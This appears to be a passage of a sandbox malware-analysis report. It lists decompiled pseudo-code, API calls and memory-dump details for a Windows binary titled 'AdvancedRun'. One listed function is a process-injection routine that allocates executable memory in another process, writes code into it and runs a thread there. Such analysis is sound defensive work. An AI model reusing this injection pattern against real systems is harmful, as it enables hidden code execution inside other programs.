                                                                                                                                                                                                                          				_t7 = __edi;
                                                                                                                                                                                                                          				_t3 =  *__edi;
                                                                                                                                                                                                                          				if(_t3 != 0) {
                                                                                                                                                                                                                          					FreeLibrary(_t3); // executed
                                                                                                                                                                                                                          					 *__edi =  *__edi & 0x00000000;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				E004099D4( &(_t7[0xa]));
                                                                                                                                                                                                                          				return E004099D4( &(_t7[6]));
                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
                                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                                          			}




                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnumNamesResource
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3334572018-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004055D1(void* __eax, signed int* __esi) {
                                                                                                                                                                                                                          				void* _t7;
                                                                                                                                                                                                                          				signed int* _t9;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t9 = __esi;
                                                                                                                                                                                                                          				_t7 = __eax;
                                                                                                                                                                                                                          				if(__esi[4] != 0) {
                                                                                                                                                                                                                          					free(__esi[4]); // executed
                                                                                                                                                                                                                          					__esi[4] = __esi[4] & 0x00000000;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t9[2] = _t9[2] & 0x00000000;
                                                                                                                                                                                                                          				 *_t9 =  *_t9 & 0x00000000;
                                                                                                                                                                                                                          				return _t7;
                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                                                          			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                          				char _v564;
                                                                                                                                                                                                                          				char _v16950;
                                                                                                                                                                                                                          				char _v33336;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _v33348;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _v33352;
                                                                                                                                                                                                                          				void _v33420;
                                                                                                                                                                                                                          				void _v33432;
                                                                                                                                                                                                                          				void _v33436;
                                                                                                                                                                                                                          				intOrPtr _v66756;
                                                                                                                                                                                                                          				intOrPtr _v66760;
                                                                                                                                                                                                                          				void _v66848;
                                                                                                                                                                                                                          				void _v66852;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t84;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t87;
                                                                                                                                                                                                                          				void* _t90;
                                                                                                                                                                                                                          				signed int _t126;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t128;
                                                                                                                                                                                                                          				intOrPtr* _t138;
                                                                                                                                                                                                                          				void* _t140;
                                                                                                                                                                                                                          				void* _t144;
                                                                                                                                                                                                                          				void* _t147;
                                                                                                                                                                                                                          				void* _t148;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				E0040B550(0x10524, __ecx);
                                                                                                                                                                                                                          				_t138 = _a4;
                                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                                          				 *_t138 = 0;
                                                                                                                                                                                                                          				_t76 = OpenProcess(0x1f0fff, 0, _a8);
                                                                                                                                                                                                                          				_a8 = _t76;
                                                                                                                                                                                                                          				if(_t76 == 0) {
                                                                                                                                                                                                                          					 *_t138 = GetLastError();
                                                                                                                                                                                                                          					L30:
                                                                                                                                                                                                                          					return _v12;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v33436 = 0;
                                                                                                                                                                                                                          				memset( &_v33432, 0, 0x8284);
                                                                                                                                                                                                                          				_t148 = _t147 + 0xc;
                                                                                                                                                                                                                          				_t128 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                          				E00409C70( &_v8);
                                                                                                                                                                                                                          				_push("CreateProcessW");
                                                                                                                                                                                                                          				_push(_t128);
                                                                                                                                                                                                                          				if(_v8 == 0) {
                                                                                                                                                                                                                          					_t84 = GetProcAddress();
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t84 = _v8();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v33352 = _t84;
                                                                                                                                                                                                                          				E00409C70( &_v8);
                                                                                                                                                                                                                          				_push("GetLastError");
                                                                                                                                                                                                                          				_push(_t128);
                                                                                                                                                                                                                          				if(_v8 == 0) {
                                                                                                                                                                                                                          					_t87 = GetProcAddress();
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t87 = _v8();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t140 = _a28;
                                                                                                                                                                                                                          				_v33348 = _t87;
                                                                                                                                                                                                                          				if(_t140 != 0) {
                                                                                                                                                                                                                          					_t126 = 0x11;
                                                                                                                                                                                                                          					memcpy( &_v33420, _t140, _t126 << 2);
                                                                                                                                                                                                                          					_t148 = _t148 + 0xc;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v33420 = 0x44;
                                                                                                                                                                                                                          				if(_a16 == 0) {
                                                                                                                                                                                                                          					_v33336 = 1;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					E00404923(0x2000,  &_v33336, _a16);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if(_a12 == 0) {
                                                                                                                                                                                                                          					_v16950 = 1;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					E00404923(0x2000,  &_v16950, _a12);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if(_a24 == 0) {
                                                                                                                                                                                                                          					_v564 = 1;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					E00404923(0x104,  &_v564, _a24);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v24 = _a20;
                                                                                                                                                                                                                          				_v28 = 0;
                                                                                                                                                                                                                          				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
                                                                                                                                                                                                                          				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
                                                                                                                                                                                                                          				_a12 = _t90;
                                                                                                                                                                                                                          				if(_a16 == 0 || _t90 == 0) {
                                                                                                                                                                                                                          					 *_a4 = GetLastError();
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
                                                                                                                                                                                                                          					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
                                                                                                                                                                                                                          					_v20 = 0;
                                                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                                                          					_a24 = 0;
                                                                                                                                                                                                                          					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
                                                                                                                                                                                                                          					_a28 = _t144;
                                                                                                                                                                                                                          					if(_t144 == 0) {
                                                                                                                                                                                                                          						 *_a4 = GetLastError();
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						ResumeThread(_t144);
                                                                                                                                                                                                                          						WaitForSingleObject(_t144, 0x7d0);
                                                                                                                                                                                                                          						CloseHandle(_t144);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_v66852 = 0;
                                                                                                                                                                                                                          					memset( &_v66848, 0, 0x8284);
                                                                                                                                                                                                                          					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
                                                                                                                                                                                                                          					VirtualFreeEx(_a8, _a16, 0, 0x8000);
                                                                                                                                                                                                                          					VirtualFreeEx(_a8, _a12, 0, 0x8000);
                                                                                                                                                                                                                          					if(_a28 != 0) {
                                                                                                                                                                                                                          						 *_a4 = _v66756;
                                                                                                                                                                                                                          						_v12 = _v66760;
                                                                                                                                                                                                                          						if(_a32 != 0) {
                                                                                                                                                                                                                          							asm("movsd");
                                                                                                                                                                                                                          							asm("movsd");
                                                                                                                                                                                                                          							asm("movsd");
                                                                                                                                                                                                                          							asm("movsd");
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					if(_v20 != 0) {
                                                                                                                                                                                                                          						FreeLibrary(_v20);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				goto L30;
                                                                                                                                                                                                                          			}
                                                                                                                                                                                                                          0x0040a4ea
                                                                                                                                                                                                                          0x0040a4e5
                                                                                                                                                                                                                          0x0040a4e5
                                                                                                                                                                                                                          0x0040a4e5
                                                                                                                                                                                                                          0x0040a4ec
                                                                                                                                                                                                                          0x0040a4f6
                                                                                                                                                                                                                          0x0040a4fe
                                                                                                                                                                                                                          0x0040a503
                                                                                                                                                                                                                          0x0040a504
                                                                                                                                                                                                                          0x0040a50b
                                                                                                                                                                                                                          0x0040a506
                                                                                                                                                                                                                          0x0040a506
                                                                                                                                                                                                                          0x0040a506
                                                                                                                                                                                                                          0x0040a50d
                                                                                                                                                                                                                          0x0040a512
                                                                                                                                                                                                                          0x0040a518
                                                                                                                                                                                                                          0x0040a51c
                                                                                                                                                                                                                          0x0040a523
                                                                                                                                                                                                                          0x0040a523
                                                                                                                                                                                                                          0x0040a523
                                                                                                                                                                                                                          0x0040a528
                                                                                                                                                                                                                          0x0040a537
                                                                                                                                                                                                                          0x0040a54c
                                                                                                                                                                                                                          0x0040a539
                                                                                                                                                                                                                          0x0040a544
                                                                                                                                                                                                                          0x0040a549
                                                                                                                                                                                                                          0x0040a558
                                                                                                                                                                                                                          0x0040a56d
                                                                                                                                                                                                                          0x0040a55a
                                                                                                                                                                                                                          0x0040a565
                                                                                                                                                                                                                          0x0040a56a
                                                                                                                                                                                                                          0x0040a579
                                                                                                                                                                                                                          0x0040a591
                                                                                                                                                                                                                          0x0040a57b
                                                                                                                                                                                                                          0x0040a589
                                                                                                                                                                                                                          0x0040a58e
                                                                                                                                                                                                                          0x0040a5b4
                                                                                                                                                                                                                          0x0040a5b7
                                                                                                                                                                                                                          0x0040a5cc
                                                                                                                                                                                                                          0x0040a5cf
                                                                                                                                                                                                                          0x0040a5d4
                                                                                                                                                                                                                          0x0040a5d7
                                                                                                                                                                                                                          0x0040a6ed
                                                                                                                                                                                                                          0x0040a5e5
                                                                                                                                                                                                                          0x0040a5fa
                                                                                                                                                                                                                          0x0040a60b
                                                                                                                                                                                                                          0x0040a61a
                                                                                                                                                                                                                          0x0040a620
                                                                                                                                                                                                                          0x0040a623
                                                                                                                                                                                                                          0x0040a62b
                                                                                                                                                                                                                          0x0040a62f
                                                                                                                                                                                                                          0x0040a632
                                                                                                                                                                                                                          0x0040a659
                                                                                                                                                                                                                          0x0040a634
                                                                                                                                                                                                                          0x0040a635
                                                                                                                                                                                                                          0x0040a641
                                                                                                                                                                                                                          0x0040a648
                                                                                                                                                                                                                          0x0040a648
                                                                                                                                                                                                                          0x0040a668
                                                                                                                                                                                                                          0x0040a66e
                                                                                                                                                                                                                          0x0040a685
                                                                                                                                                                                                                          0x0040a69e
                                                                                                                                                                                                                          0x0040a6a8
                                                                                                                                                                                                                          0x0040a6ad
                                                                                                                                                                                                                          0x0040a6bd
                                                                                                                                                                                                                          0x0040a6c5
                                                                                                                                                                                                                          0x0040a6c8
                                                                                                                                                                                                                          0x0040a6d0
                                                                                                                                                                                                                          0x0040a6d1
                                                                                                                                                                                                                          0x0040a6d2
                                                                                                                                                                                                                          0x0040a6d3
                                                                                                                                                                                                                          0x0040a6d3
                                                                                                                                                                                                                          0x0040a6c8
                                                                                                                                                                                                                          0x0040a6d7
                                                                                                                                                                                                                          0x0040a6dc
                                                                                                                                                                                                                          0x0040a6dc
                                                                                                                                                                                                                          0x0040a6d7
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A4B3
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                                                                                                                                                            • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                                                                                                                            • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                                                                                                                            • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                                                                                                                            • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                                                                                                                            • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                                                                                                                                                            • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                                                                                                                                                          • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A66E
                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                                                                                                                                                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                                                                                                                                                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                                                                                                                                                          • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 1572607441-20550370
                                                                                                                                                                                                                          • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                                                                                                                          • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                          			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                                                                                                                                                                                          				struct tagPOINT _v12;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t47;
                                                                                                                                                                                                                          				struct HBRUSH__* _t56;
                                                                                                                                                                                                                          				void* _t61;
                                                                                                                                                                                                                          				unsigned int _t63;
                                                                                                                                                                                                                          				void* _t68;
                                                                                                                                                                                                                          				struct HWND__* _t69;
                                                                                                                                                                                                                          				struct HWND__* _t70;
                                                                                                                                                                                                                          				void* _t73;
                                                                                                                                                                                                                          				unsigned int _t74;
                                                                                                                                                                                                                          				struct HWND__* _t76;
                                                                                                                                                                                                                          				struct HWND__* _t77;
                                                                                                                                                                                                                          				struct HWND__* _t78;
                                                                                                                                                                                                                          				struct HWND__* _t79;
                                                                                                                                                                                                                          				unsigned int _t85;
                                                                                                                                                                                                                          				struct HWND__* _t87;
                                                                                                                                                                                                                          				struct HWND__* _t89;
                                                                                                                                                                                                                          				struct HWND__* _t90;
                                                                                                                                                                                                                          				struct tagPOINT _t96;
                                                                                                                                                                                                                          				struct tagPOINT _t98;
                                                                                                                                                                                                                          				signed short _t103;
                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                          				void* _t117;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t106 = __edx;
                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                          				_t47 = _a4 - 0x110;
                                                                                                                                                                                                                          				_t117 = __ecx;
                                                                                                                                                                                                                          				if(_t47 == 0) {
                                                                                                                                                                                                                          					__eflags =  *0x40feb0;
                                                                                                                                                                                                                          					if(__eflags != 0) {
                                                                                                                                                                                                                          						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
                                                                                                                                                                                                                          						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
                                                                                                                                                                                                                          					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
                                                                                                                                                                                                                          					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
                                                                                                                                                                                                                          					E0040103E(_t117, __eflags);
                                                                                                                                                                                                                          					E00404DA9(_t106,  *(_t117 + 0x10), 4);
                                                                                                                                                                                                                          					goto L30;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t61 = _t47 - 1;
                                                                                                                                                                                                                          					if(_t61 == 0) {
                                                                                                                                                                                                                          						_t103 = _a8;
                                                                                                                                                                                                                          						_t63 = _t103 >> 0x10;
                                                                                                                                                                                                                          						__eflags = _t103 - 1;
                                                                                                                                                                                                                          						if(_t103 == 1) {
                                                                                                                                                                                                                          							L24:
                                                                                                                                                                                                                          							__eflags = _t63;
                                                                                                                                                                                                                          							if(_t63 != 0) {
                                                                                                                                                                                                                          								goto L30;
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
                                                                                                                                                                                                                          								DeleteObject( *(_t117 + 0x43c));
                                                                                                                                                                                                                          								goto L8;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							__eflags = _t103 - 2;
                                                                                                                                                                                                                          							if(_t103 != 2) {
                                                                                                                                                                                                                          								goto L30;
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								goto L24;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_t68 = _t61 - 0x27;
                                                                                                                                                                                                                          						if(_t68 == 0) {
                                                                                                                                                                                                                          							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                                                                                                                          							__eflags = _a12 - _t69;
                                                                                                                                                                                                                          							if(_a12 != _t69) {
                                                                                                                                                                                                                          								__eflags =  *0x40ff30;
                                                                                                                                                                                                                          								if( *0x40ff30 == 0) {
                                                                                                                                                                                                                          									goto L30;
                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                          									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                                                                                                                          									__eflags = _a12 - _t70;
                                                                                                                                                                                                                          									if(_a12 != _t70) {
                                                                                                                                                                                                                          										goto L30;
                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                          										goto L18;
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								L18:
                                                                                                                                                                                                                          								SetBkMode(_a8, 1);
                                                                                                                                                                                                                          								SetTextColor(_a8, 0xc00000);
                                                                                                                                                                                                                          								_t56 = GetSysColorBrush(0xf);
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_t73 = _t68 - 0xc8;
                                                                                                                                                                                                                          							if(_t73 == 0) {
                                                                                                                                                                                                                          								_t74 = _a12;
                                                                                                                                                                                                                          								_t96 = _t74 & 0x0000ffff;
                                                                                                                                                                                                                          								_v12.x = _t96;
                                                                                                                                                                                                                          								_v12.y = _t74 >> 0x10;
                                                                                                                                                                                                                          								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                                                                                                                          								_push(_v12.y);
                                                                                                                                                                                                                          								_a8 = _t76;
                                                                                                                                                                                                                          								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
                                                                                                                                                                                                                          								__eflags = _t77 - _a8;
                                                                                                                                                                                                                          								if(_t77 != _a8) {
                                                                                                                                                                                                                          									__eflags =  *0x40ff30;
                                                                                                                                                                                                                          									if( *0x40ff30 == 0) {
                                                                                                                                                                                                                          										goto L30;
                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                          										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                                                                                                                          										_push(_v12.y);
                                                                                                                                                                                                                          										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
                                                                                                                                                                                                                          										__eflags = _t79 - _t78;
                                                                                                                                                                                                                          										if(_t79 != _t78) {
                                                                                                                                                                                                                          											goto L30;
                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                          											goto L13;
                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                          									L13:
                                                                                                                                                                                                                          									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
                                                                                                                                                                                                                          									goto L8;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								if(_t73 != 0) {
                                                                                                                                                                                                                          									L30:
                                                                                                                                                                                                                          									_t56 = 0;
                                                                                                                                                                                                                          									__eflags = 0;
                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                          									_t85 = _a12;
                                                                                                                                                                                                                          									_t98 = _t85 & 0x0000ffff;
                                                                                                                                                                                                                          									_v12.x = _t98;
                                                                                                                                                                                                                          									_v12.y = _t85 >> 0x10;
                                                                                                                                                                                                                          									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                                                                                                                          									_push(_v12.y);
                                                                                                                                                                                                                          									_a8 = _t87;
                                                                                                                                                                                                                          									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
                                                                                                                                                                                                                          										__eflags =  *0x40ff30;
                                                                                                                                                                                                                          										if( *0x40ff30 == 0) {
                                                                                                                                                                                                                          											goto L30;
                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                          											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                                                                                                                          											_push(_v12.y);
                                                                                                                                                                                                                          											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
                                                                                                                                                                                                                          											__eflags = _t90 - _t89;
                                                                                                                                                                                                                          											if(_t90 != _t89) {
                                                                                                                                                                                                                          												goto L30;
                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                          												_push(0x40ff30);
                                                                                                                                                                                                                          												goto L7;
                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                          										_push(_t117 + 0x23e);
                                                                                                                                                                                                                          										L7:
                                                                                                                                                                                                                          										_push( *(_t117 + 0x10));
                                                                                                                                                                                                                          										E00404F7E();
                                                                                                                                                                                                                          										L8:
                                                                                                                                                                                                                          										_t56 = 1;
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t56;
                                                                                                                                                                                                                          			}



























                                                                                                                                                                                                                          0x004010e8
                                                                                                                                                                                                                          0x004010eb
                                                                                                                                                                                                                          0x004010ed
                                                                                                                                                                                                                          0x004010f0
                                                                                                                                                                                                                          0x00401102
                                                                                                                                                                                                                          0x0040111d
                                                                                                                                                                                                                          0x00401125
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040112b
                                                                                                                                                                                                                          0x00401133
                                                                                                                                                                                                                          0x00401135
                                                                                                                                                                                                                          0x00401140
                                                                                                                                                                                                                          0x00401142
                                                                                                                                                                                                                          0x00401144
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040114a
                                                                                                                                                                                                                          0x0040114a
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040114a
                                                                                                                                                                                                                          0x00401144
                                                                                                                                                                                                                          0x00401104
